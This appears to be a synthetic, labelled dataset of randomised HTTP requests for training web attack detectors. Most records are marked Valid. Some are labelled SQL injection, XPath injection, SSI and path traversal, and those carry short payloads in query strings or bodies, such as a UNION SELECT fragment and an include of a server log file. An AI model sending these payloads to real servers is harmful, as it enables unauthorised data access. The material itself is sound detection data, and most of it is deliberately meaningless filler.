UA-Disp: 3168,424,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3313x7933
Via: ifxBm/1.8 www.telht.js:24179
Transfer-Encoding: deflate
Upgrade: Oso/1.6, n77i/2.9, maoeo/6.3, 6lx/0.3, nnpy/1.7
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 79351042472156559
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 3052
Start - Id: 19908
class: Valid
GET /eeDHm79fUUnGdi0/as.asmx?UDSuYs.lrmWB6=cI&8i4=6294&T@Ub0=6&ua=74609150 HTTP/1.0
Host: www.gHixa.de
Connection: ehen
Accept: */*;q=0.7
Accept-Charset: windows-1250;q=0.9, x-mac-cyrillic;q=0.9, windows-1255;q=0.9, iso-2022-jp;q=0.7
Accept-Encoding: 
Accept-Language: eaoesbun-rArpdt, Eiotvmmn-ytOn1
Cache-Control: max-stale=1
Client-ip: 217.141.253.33
Cookie: qyliliw6erh=0535499258;nirnEfeobmnOte2=hoy;Gnwceiahap7s=70907592;en7ee=wnztei|tf+havingt;i5=d&d
Cookie2: $Version="93"
Date: Mon, 18 Sep 06 11:19:38 UTC
ETag: "cVzjY4J5nvzL3xt6l"
Expect: 100-continue
From: artPioiw@etdnedoep.fr
If-Modified-Since: Sat, 22 May 04 19:12:53 CET
If-Unmodified-Since: Thu, 28 Jan 10 05:20:03 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jul 04 12:07:22 GMT
Max-Forwards: 8
MIME-Version: 0.4
Pragma: vhwSe='l'
Proxy-Authorization: Digest nonce
Authorization: htpt nzKcRunr=aznays
Range: -8804
Referer: http://Mkweega.org/aG0usz.css
TE: deflate;q=0.9,chunked;q=0.7
Trailer: Connection
User-Agent: Mozilla/1.8 (compatible; Konqueror/4.5; Windows NT; eome; soirtsc; ootBT1Haye)
UA-CPU: StrongARM
UA-Disp: 611,1277,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 205x6501
Via: HTTP/0.7 www.ip1nius.tiff, eeda/4.3 www.HmmWi.html
Transfer-Encoding: deflate
Upgrade: nofnHJ/3.3, Eo0/1.9, eex/2.7, dloapf/3.8
Warning: 431 103.132.199.19 "edesstaoetncjym5olrr" 
X-Forwarded-For: 43.150.154.249
X-Serial-Number: 11565952861690
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19908
Start - Id: 18627
class: Valid
GET /sEg/iZdLsBL8ymZ/yF6fFe/e2n/atqnij0liot/gF.j1fWXVrT.jpeg?Holn=xTt&g-rgmetacmdCrG=4tssofT8igBom2d&ge2o7nxqmdasso=55&utg8pE3fd=4ltenandgandWnk8nosSsamio&Ir4shca4fan=vmud&ljaetpultRnt=openereijh4&ipmhu6t7t0iI=2jreplace%40odewget&yowcmd=cee&ecknhgfosd=l+s6&ttueTH4=415574816 HTTP/1.0
Host: www.shvtnta.gov
Connection: close
Accept: */*
Accept-Charset: macintosh, utf-8;q=0.3, big5;q=0.6, iso-8859-4, x-mac-ce;q=0.5
Accept-Encoding: 
Accept-Language: ttmzeh0-gxPtaSii, aeh8-genieea;q=0.0
Cache-Control: max-stale
Client-ip: 101.141.205.16
Cookie: seh0raykioRaaY=20453255;s0eghzsTgsi=uhtbn;se=9726441500
Cookie2: $Version="38"
Date: Sun, 17 May 09 18:13:49 UTC
ETag: "l-bp1poSeDKn6Y_WO"
Expect: 100-continue
From: ngeuv@oyDuo4lt.uk
If-Modified-Since: Sat, 01 Oct 05 08:00:58 UTC
If-Unmodified-Since: Tue, 21 Mar 06 21:41:17 CET
If-Match: *
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: Fri, 19 May 06 04:39:50 UTC
Max-Forwards: 85
MIME-Version: 1.7
Pragma: d='a'
Proxy-Authorization: Basic ZW90YWlpOmhmZWhlRQ==
Authorization: NTLM em9kMW9pb2V1cHh0NTh0dHB5ZWdlbHd1aFNhb2c5bmltbmVlOQ==
Range: -0
Referer: /SaGdSar/sl8ytan3/yeodhD/froe.wmn
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: onnteee9nNrcsY
UA-CPU: 68000
UA-Disp: 7139,4412,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7882x967
Via: 5.9 44.135.152.240, 9.0 154.144.162.28, HTTP/0.9 www.eedmE5.html
Transfer-Encoding: identity
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 871 165.27.62.53 "hetiwpovou9" 
X-Forwarded-For: 76.62.187.142
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18627
Start - Id: 44684
class: PathTransversal
PUT /JNV01Tb.gif? HTTP/1.0
Content-Length: 130
Content-Language: hnrioa2n
Content-Encoding: compress
Content-Location: /ssSm4vef/Eynnhh/2e3oaf.jpeg
Content-MD5: aGRhYW5hYXJzYWJ0andlcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Sep 08 04:18:23 UTC
Last-Modified: Fri, 30 Jul 04 02:38:46 CET
Host: www.ceNhntaafo.it:077
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: utf-7, iso-2022-jp, ks_c_5601-1987, x-mac-arabic;q=0.7
Accept-Encoding: compress, deflate, deflate;q=0.9, compress, deflate;q=0.2
Accept-Language: *
Cache-Control: max-age=48864
Client-ip: 209.36.114.208
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="204"
Date: Wed, 31 May 06 24:17:19 CET
From: lhlpdrcp@ehieTi.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Mon, 05 Feb 07 12:42:57 CET
If-None-Match: "u72unQyI2RbxM0ErdJ"
If-Range: *
Max-Forwards: 7225
Pragma: fi54='di'
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: /odoet/eIpden/ehds/ssnf/xaediii.js
TE: trailers,gzip,deflate
Trailer: Cache-Control
User-Agent: necie/6.9.5
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 562x3540
Via: 9.5 www.N0nC0n.gif, 9.2 205.210.10.205:035, HTTP/8.3 82.108.16.150
Transfer-Encoding: identity
Upgrade: 2dgtes/0.6
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

o1ai=dit|nkrsheservicese7ezg>e&tnTeo=collection(  file:///c:/Ogr/rxof.xml)&MUgeoptconnect8=h_3S44J&e21=w(h

End - Id: 44684
Start - Id: 27732
class: Valid
GET /te8pa/gBe3trbeRhepe/aeshrEnunhrilfn/e@iC_q3_HV2JFwi_oZ/avPPEjHX/i3tzTHXZ8Dqh5VBAeQ4.asmx?vanD4its=-etfgwfs&eehehe3lznexf=eovnsgL2vZy&edeeOr=nnph-a&7tgonyeaRhiy4tr=70 HTTP/1.0
Host: www.peet7.com:49
Connection: nnp7o8
Accept: audio/basic;q=0.5, audio/*
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 109.189.121.197
Cookie: dsbtrfKg5t7dP=zfZNMXNcaF;tet4otccteoe8ca=roeeod;sO40MN=qs/eom5h3;Ckwp-O=SO0ar
Cookie2: $Version="5"
Date: Fri, 02 May 08 04:48:57 UTC
ETag: "v0pLV3uZiu.O-qE2qN.1"
Expect: 100-continue
From: lc4A@easege.org
If-Modified-Since: Fri, 29 Sep 06 20:30:27 UTC
If-Unmodified-Since: Mon, 01 Jan 07 20:39:30 UTC
If-Match: "jcLzerIf-ZgsWSf44@"
If-None-Match: *
If-Range: Sat, 28 Jun 08 15:20:15 GMT
Max-Forwards: 1696
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dFJEdGk6NVluZQ==
Authorization: Basic cHZzc1B3Oml5SHN0
Range: 6-4,53-
Referer: http://www.nirLearr.org/rasot/l0mi.jpeg
TE: trailers,chunked,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (Windows; U; Windows NT 8.2; ig-c3; rv:9.9.3) Gecko/39550909
UA-CPU: 68000
UA-Disp: 909,493,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 483x5740
Via: FTP/4.7 www.unrisbyt.jpeg
Transfer-Encoding: deflate
Upgrade: ugn/2.8
Warning: 358 www.hu7esut.jpeg "amcct9eduta2rliG" 
X-Forwarded-For: 120.223.12.165
X-Serial-Number: 3296146
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27732
Start - Id: 258
class: Valid
GET /mN0oC83hhmn/sphfifteqolarekse/gSGor6eReJOEQB/ejraeAutnecpe/o3kAoit9tsostt.nsf?ocso0=kOU&ehuaero6nd=iiI&8tesiui=evIy&0ctIaye4y=rfydCl HTTP/1.1
Host: www.bq0mo.net
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-greek, iso-2022-jp, x-mac-arabic;q=0.8, iso-8859-2;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=35
Client-ip: 237.190.39.41
Cookie: hwSjtir=utteQwwpdeaS;SjyMSmv5s=fKS-DH_M_1
Cookie2: $Version="96"
Date: Sun, 21 Dec 08 06:45:09 CET
ETag: W/"8ngAg-0J-BQAxHJ"
Expect: tpitsuee=kaEHtmts
From: bfsu@ii7mg.cz
If-Modified-Since: Mon, 27 Oct 08 22:35:58 UTC
If-Unmodified-Since: Tue, 22 Dec 09 15:12:03 GMT
If-Match: "W9Fuoy4ki9uEdROlG0-"
If-None-Match: *
If-Range: Sun, 21 Jun 09 14:46:29 UTC
Max-Forwards: 1
MIME-Version: 9.7
Pragma: b=i
Proxy-Authorization: nnedm sagh=xef1hdc
Authorization: Digest realm
Range: -735916,3400-462,6-4322
Referer: /0oooe/8rfn/eeemito/1sEmaod.png
TE: gzip;q=0.5,trailers
Trailer: Date
User-Agent: i2n5toMdE (uzcUuwyzT)
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 2.4 www.shaer9.jpeg, HTTP/4.3 www.echtsnes.css
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 778 228.207.156.98 "emdbsg0nhaeda1q" "Thu, 02 Sep 04 15:14:39 UTC"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 258
Start - Id: 11181
class: Valid
GET /o78cUR8XafoVLFh/yIZ_jhAtQaRS/crrh/slduqtt1unwrut/6htod.shtml?0efshdoFgn5ene=%5D HTTP/1.1
Host: 10.66.61.115
Connection: close
Accept: video/*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 31.125.40.176
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="235"
Date: Wed, 05 Aug 09 03:19:18 CET
ETag: "JqqkIqCF4xV4FZRK"
Expect: uwz3uN
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Sat, 21 Apr 07 24:45:14 UTC
If-Unmodified-Since: Sat, 08 Apr 06 09:27:28 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic Ym9pZWhhOjRueWU1enN0
Authorization: anoe4h Sone=lcsavTrj
Range: -6966,-2,79731-5613
Referer: http://jhPe.org/peWs81/dn3crIs/s0ueTs/unBa7h/hAA7.txt
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.7 (Windows; U; WinNT 3.7; 7t-Bm; rv:3.4.8) Gecko/61281674
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0885x0139
Via: 6.7 161.82.46.229, 6.0 2.5.189.2, 4.0 www.dtrlha5a.tiff:05163
Transfer-Encoding: deflate
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 400472964333803
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11181
Start - Id: 3104
class: Valid
GET /mlJCV1VIKVAt4Y0e8/l-2XKHCI.wSGRf/cnj/kwetrrshz9witvslb/GscriptheTDocZ/sOu/VncpMdropy.php3?nincluderLgRy8-6=z9aR&ljs7lteOtstne=90465061&VGc2=eeqot&delIhhdq=526701&iiiA4ryesanaih=bs&ectndai=rt HTTP/1.0
Host: www.hFoea.fr
Connection: fs6oa
Accept: audio/*;q=0.5
Accept-Charset: shift_jis;q=0.9, iso-8859-15, koi8-r;q=0.2, x-mac-chinesetrad, gb2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=95037
Client-ip: 178.122.130.175
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="306"
Date: Mon, 09 Oct 06 22:45:27 GMT
ETag: "4Ll0_82lrVtR2rBjtA"
Expect: Irerhlnt
From: elot@iettrDhpp.gov
If-Modified-Since: Wed, 23 Nov 05 21:35:13 GMT
If-Unmodified-Since: Sat, 06 Nov 04 10:00:02 CET
If-Match: "glP6@51npR_Y9kSy2LNR"
If-None-Match: "UU9SPYiGKcQrfzeK.xL"
If-Range: Tue, 01 Apr 08 05:25:36 UTC
Max-Forwards: 9469
MIME-Version: 3.5
Pragma: soeecs=xcgucu
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic dGlhbmJ3OnRkc283OWY=
Range: 08395-
Referer: /ehPhD/es5toolo/ss0s.mspx
TE: gzip,deflate,deflate
Trailer: Upgrade
User-Agent: Mozilla/6.5 (compatible; Konqueror/1.9; Linux i386; aaiDLrine)
UA-CPU: MIPS
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: 9.8 98.192.179.92, 5.5 www.st9aal.html
Transfer-Encoding: deflate
Upgrade: 6te/4.3, reiog/2.9, ctnoo0/7.3, hxHaad/5.5, ldtkhe/8.4
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 50270
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3104
Start - Id: 19649
class: Valid
GET /eeawroaisgewbhxva.sh?enidks5tbi8sta=aaqa8rlit3albetweenz&sshzr6oshtin=si&e2e1eaglge76nu=bthe&wntsmhurnef=euauwtah0ozp&xv=wvS6u&rdvRqkVI=e%2B&elJet5zebdawhd=16&wpqleT2=90422186&iegedigejanrrti=is7%7Cub8eEimhlreeoe HTTP/1.1
Host: www.tYfuaawe.ch
Connection: dp4r
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=32
Client-ip: 40.135.108.239
Cookie: eL1hwree=ew7QnZ-aR1CJ;from7xO-QT=er1
Cookie2: $Version="3"
Date: Sat, 12 Jan 08 23:05:02 GMT
ETag: "zomKoLVgTnxloO."
Expect: ftAt=ab3meor;c4rYeIvh=Peewep
From: sbhe@iho1e.be
If-Modified-Since: Tue, 11 Jan 05 03:08:42 UTC
If-Unmodified-Since: Thu, 22 Nov 07 01:16:46 CET
If-Match: *
If-None-Match: *
If-Range: "10UVof_xR3fy2kd"
Max-Forwards: 13
MIME-Version: 6.3
Pragma: gtt3da='hktw'
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM YXRlZGJSY3lhNmFmbnZrZ2FlblBwbjJzbXNyd2NzcWJoTW9yZmlpRXJ0c29kQWdu
Range: -024991,27106-5914,1905-57
Referer: /itlyR/Eaduoi.php
TE: trailers,gzip,chunked
Trailer: Accept-Language
User-Agent: cmhz/2.4.4.0.4
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 106x833
Via: HTTP/9.3 158.145.22.189:94
Transfer-Encoding: identity
Upgrade: eShaio/0.4
Warning: 810 www.eaz2f.html "uaAp" 
X-Forwarded-For: 44.241.139.6
X-Serial-Number: 46232524708716277556
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19649
Start - Id: 49100
class: XPathInjection
GET /tmaalfB/sitlafldgSts.dll?KCKLVu0=nl%27++++or+++++oueq%2FEae%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D416%5D+++or+%27iri%27%3D%27&R5fi=anr HTTP/1.0
Host: www.viOr1.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 215.194.111.216
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="212"
Date: Wed, 15 Dec 04 22:19:54 CET
ETag: W/"9c1zWwtNPtQbZAAbA6q"
Expect: aZnyhTei
From: oayjh@w9ulna6.biz
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sun, 05 Jun 05 14:00:58 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: "uyfznM1XcRBNtR-"
If-Range: Sun, 31 Oct 04 03:34:56 GMT
Max-Forwards: 1
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: Digest username="dtidd7q"
Range: -21
Referer: /iho7iEaq/igiROsDp/et2oata/lxsrier.mp3
TE: deflate;q=0.4,trailers
Trailer: Referer
User-Agent: hajnaqhegs (qDcbNe7iQ; e4ATXZWeI; eYhuwWVx8)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: identity
Upgrade: aau/4.8
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49100
Start - Id: 39586
class: SSI
GET /To/ZMmetanodepzoiCJS/bS@VgbU23HmBeI01P3S/r4GFU/rr1c/a5ZpXOtig/oasmwSogay/9orEiolrdec/iryP/n41cEsbiyilrzl/frcdl2e6pwoamst.css?EI1stdinwfGP@=5&nhirssmcihziara=86573058&hreoiiuunf5=269825988&hemq=%3C%21--++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&llOKjg7@=mtibwm&rspaddnajee7=283483560&opi=i9wI%40&ite=tgslle HTTP/1.0
Host: 226.252.194.17
Connection: close
Accept: application/rtf
Accept-Charset: iso-2022-jp, windows-1258, x-mac-chinesetrad, x-mac-icelandic
Accept-Encoding: 
Accept-Language: ophc-t;q=0.7, e2wudee-t, mutsoyi-ise, ucecyezG-tleeosn;q=0.0
Cache-Control: max-stale=2
Client-ip: 241.190.56.140
Cookie: 0s8TLBtelnetX0d=0266040101
Cookie2: $Version="0"
Date: Sat, 09 Dec 06 15:47:21 GMT
ETag: "QQaFNHDxvsmJsy85@QP"
From: szEete@ence.uk
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Thu, 18 Jun 09 14:46:06 CET
If-Match: "NT@HrC4H1m@vVr4OO"
If-Range: *
Max-Forwards: 9
Pragma: no-cache
Authorization: Digest realm
Range: 5591-,251722-40474
Referer: http://www.nkcod.cz/o7son/omxm/setrE/0rrdstr/eeUua.bin
TE: trailers
User-Agent: tgicde
UA-Disp: 779,442,32
UA-OS: Win98
Via: ltor/8.3 www.sbuSfoIf.jpg, 2.1 www.tisrQs.jpeg:2
Transfer-Encoding: eeLx
Upgrade: oshili/5.5, wen/5.9
Warning: 816 90.205.210.114 "n6wratgRHtneatUce" "Sun, 10 Jun 07 18:21:41 GMT"

null

End - Id: 39586
Start - Id: 42228
class: SqlInjection
GET /nZngC/oKLkGjwfTv1ZZr/wOZXqO/dHDyffadTJnzh3vuiFS/fp/uSdtHARhntl/syMmQEfdc9sHNV/Q50nWi@uKu/71NCS_/Ec/Toubk/yLDkJ-.htm?cClqdtleecaqohp=rsltcfemdywotYeI&nnco=034&wIe2Grrthrhrtb=7668670&%uEAT_snform=%27UNIONALLSELECTfieldFROMventolilWHERE%27%27+++%3D+%27&ehlh7oni9i=l&snvtheoip=dhgw&bZwMPhttps@bqxmls=+T&hmuoa=9nbbmey&tlsd=eeia8nrERpniNa HTTP/1.0
Host: www.ouppnIiec.st:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, euc-tw;q=0.2, koi8-r, windows-1254;q=0.2
Accept-Encoding: deflate, gzip;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: nwxthhped32=918412034;wa41.Zzy5_K=992411;XE0b=86884;ruee=E'eCe
Cookie2: $Version="303"
Date: Mon, 08 Aug 05 24:11:17 CET
ETag: W/"sIriMAl4WPniCIC"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Fri, 10 Feb 06 01:18:16 UTC
If-Unmodified-Since: Sat, 03 Mar 07 10:48:30 CET
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "pv@qrWadt1tIHUizA"
Max-Forwards: 7106
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: liebx YIod=sa9l
Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 498-82346
Referer: /gRailId/scpfiiwj/odz6.conf
TE: deflate;q=0.0,trailers,trailers
Trailer: If-Range
User-Agent: ixt3GK http://www.elnno1rt.com
UA-CPU: x86
UA-Disp: 4436,548,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: eotna/9.4 241.246.236.121
Transfer-Encoding: eiqbe; sAwm=flea0w9
Upgrade: haadce/5.9, cssnn/7.7
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42228
Start - Id: 23873
class: Valid
GET /tQ/iaceiaef/s4cRraeient/tup@0Sp/t342Va.css?hr=or%407pBlXbEEc&ewhoa=amaXee%5CutnjNyd%7CS&AodcceeeLo=8&iwlOdoehyeUdi0s=%3Cnallltcbgsoundimg HTTP/1.0
Host: 241.145.191.180
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4, deflate;q=0.0, compress;q=0.9, compress
Accept-Language: otemniDh-tno7Nsng;q=0.2, t7aGe-Gd;q=0.9, c-ete;q=0.6, Aluem-wokbAztn
Cache-Control: no-cache
Client-ip: 130.249.176.167
Cookie: n7hejittgp=[dnodecq
Cookie2: $Version="20"
Date: Sat, 06 Feb 10 24:26:57 GMT
ETag: "XIcz6IuZ3FRwBKWTkH"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Sat, 10 Jan 04 17:53:02 UTC
If-Unmodified-Since: Thu, 17 May 07 04:57:54 CET
If-Match: "d4J44Z3gJUpodZ_zgb4"
If-None-Match: "Qq@eVh3ZfDg6WyHa"
If-Range: "wpjcElo@gU@EGSdzc"
Max-Forwards: 9529
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: ree1 RTnsdpfs=hElt
Authorization: NTLM YWV5M3VBNWVhc3F1b2RVMnNkYWhycmdlbmlsb3RpZG5pZXRoZUQ=
Range: 160-39
Referer: /erbwvonx/yhrsoe/htdrDEkr.msf
TE: trailers,trailers,deflate;q=0.9
Trailer: Date
User-Agent: np6c/9.0.3.8
UA-CPU: 68000
UA-Disp: 734,1255,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 470x399
Via: feerxm/6.4 22.214.145.99, 7.8 208.48.123.209, 8.9 172.179.2.199
Transfer-Encoding: compress
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 011 156.147.40.52 "rdo9insd0rnm5isiuwim" "Sat, 18 Sep 04 21:23:03 CET"
X-Forwarded-For: 17.40.114.14
X-Serial-Number: 6817355934
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23873
Start - Id: 1046
class: Valid
GET /2cnrrr4en6ex9/n2ONR.msf?hyhtoabtlnnyr=ildrd&sof9einne5tyqtb=jeso%29ijfimochaeaT&a9euce=lwSE HTTP/1.0
Host: www.iLaDtenhng.biz:71774
Connection: keep-alive
Accept: text/xml;q=0.8, text/html;q=0.3, audio/*
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-turkish;q=0.6, iso-8859-4, windows-1258
Accept-Encoding: compress, identity;q=0.3, gzip
Accept-Language: 7wa6Nt-sseh
Cache-Control: l='eslg'
Client-ip: 249.62.66.135
Cookie: pitw3eih=611669162;uduemetrchesi=ifY2envv5X0q
Cookie2: $Version="449"
Date: Sat, 01 May 10 10:37:31 GMT
ETag: "3gnTJCEQdXBWhxkQD.h2"
Expect: omon5e
From: lSpom@es6vknOma.biz
If-Modified-Since: Tue, 15 Nov 05 07:25:52 GMT
If-Unmodified-Since: Thu, 15 Jan 04 09:20:04 CET
If-Match: "6TcN.9FZ6zpNWZbl@Kp"
If-None-Match: "IJuorofev6.ZsoxgU-"
If-Range: *
Max-Forwards: 292
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM YWRpbmxnaGg2bGlzZXBSaTRtS3JDZ2w4Z3J6d2FyM2k2YnJn
Authorization: NTLM ZDZicmQ4ZEVzemlPaTFhaDFubnYyc2tjaWVld250eG9udXV6azVlcjl0c2Vv
Range: 86150-
Referer: http://hsT9cd8r.ch/lomsen/e4hJ/eteArn/89qizaa.asmx
TE: deflate
Trailer: If-Modified-Since
User-Agent: ast8eey/0.2
UA-CPU: MIPS
UA-Disp: 235,5238,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8806x127
Via: 5etq/2.4 www.ceecdbd.jpg, etde/1.7 44.162.74.181, 3.1 130.138.187.189:9422
Transfer-Encoding: identity
Upgrade: ihTafo/2.0, nep/7.8, Uyc4a/9.8, srh/6.2
Warning: 412 1.70.23.21 "qmhue6nreaztecan" "Fri, 29 Oct 04 18:45:48 UTC"
X-Forwarded-For: 101.119.184.116
X-Serial-Number: 3135796940
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 1046
Start - Id: 1829
class: Valid
GET /g98EAP4r2txmldocumentE9Y/cOCD5/i9jt1/tPlColT9P9F/mx/w4sqKD1stdinHEbfromiU/dwIwOGzQgq9D6/30MYJX-LxBKQ9/s4t.asmx?zotsl5=983&4XCpg=eeoeiogrreplacelte&nB=ef+ahr&wHD-tL.Sft=n5cj&6i=2&4yupdateY3I7=b%3Bs7gusrrmT%26+&e9anaysy=r2f&i5EOeetnreci39=00&qmessRmta=70&hoaeit=jTkgcw&u0=+eeoreggraod%7Cz1&0a4fDhiwd=aaleh0oa&ntsspn1hAh8=eosamSxs0&a2lsir7ms1tzrge=herVfgrAye HTTP/1.0
Host: 108.167.38.115
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: stonzI-laodSpM;q=0.6, sttsybN-5rsizHot;q=0.7, eucntg-iTrge;q=0.8, iseloao-ir2nn;q=0.6, w-seeeLr
Cache-Control: max-age=05791
Client-ip: 126.243.206.148
Cookie: 3at=7oaSlHriaq;TVs=nttaUdr;nwsm7n=iCeYelhecd;qee=osesilrisoas3ze;JquvwKOshttpdG1=80243640;phib0utc=A9sssam
Cookie2: $Version="78"
Date: Thu, 10 Jul 08 04:46:41 CET
ETag: W/"C8zLsVa6emQ.T_QpqLHF"
Expect: asReiisa=mLvton2a
From: etiimsr@2ilc8.de
If-Modified-Since: Tue, 05 Feb 08 17:40:12 GMT
If-Unmodified-Since: Fri, 19 Jun 09 05:36:06 GMT
If-Match: *
If-None-Match: "g09ckzPwhLUyF@SB6"
If-Range: "8DTy-_5229-W8pexUo"
Max-Forwards: 384
MIME-Version: 8.3
Pragma: tnuZtd='aiLsttc'
Proxy-Authorization: NTLM cnpvZmg1bnRzYWc4aG5jYm9ucnR0bWdjY2g4b3pqa29yMURTcGVyZW1k
Authorization: Basic YW9iZWk6YWVlZUR0
Range: -1402,47341-
Referer: http://enndl5e.biz/rrshobe/anntlxtg/37soth/4visE.sh
TE: deflate,gzip;q=0.7,trailers
Trailer: Warning
